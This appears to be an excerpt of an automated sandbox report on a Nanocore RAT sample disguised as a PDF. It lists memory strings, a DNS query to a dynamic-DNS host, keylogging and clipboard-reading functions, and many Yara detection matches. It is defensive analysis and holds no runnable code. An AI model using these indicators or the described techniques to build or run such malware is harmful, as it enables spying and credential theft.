Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown

DNS traffic detected: queries for: december2n.duckdns.org

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_0038D7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,

2_2_0038D7A1

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

2_2_0037A54A

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

2_2_0038F45C

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

2_2_0038F45C

Installs a raw input device (often for capturing keystrokes)

Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: RegisterRawInputDevices

Potential key logger detected (key state polling based)

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

2_2_003A9ED5

E-Banking Fraud

Yara detected Nanocore RAT

Source: Yara match	File source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
